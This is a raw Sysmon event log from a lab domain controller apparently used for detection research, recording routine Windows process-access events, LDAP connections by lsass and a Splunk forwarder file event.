07:54:12.276{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049605Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:12.276{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|c:\windows\system32\psmsrv.dll+e342|c:\windows\system32\psmsrv.dll+eb86|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049604Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:12.244{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049603Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:12.244{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049602Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:12.244{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+36dd2|c:\windows\system32\rpcss.dll+4401|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049601Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:12.207{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049600Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:12.207{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049599Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:12.207{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049598Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:12.207{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049597Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:12.207{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049596Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:12.207{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049595Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:12.207{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049594Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:12.207{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 354300x80000000000000001049593Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:04.535{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local51053-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 354300x80000000000000001049592Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:04.535{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local51053-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 23542300x80000000000000001049591Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:12.123{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=521510AD599311377B4DBE2AE420CE2D,SHA256=7B5367F50A436369E3AEA3EF97223D594BE3D387692D8D2CFE82C82CF107C44E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049634Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:13.391{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049633Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:13.391{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049632Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:13.391{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049631Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:13.391{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049630Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:13.391{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049629Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:13.391{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+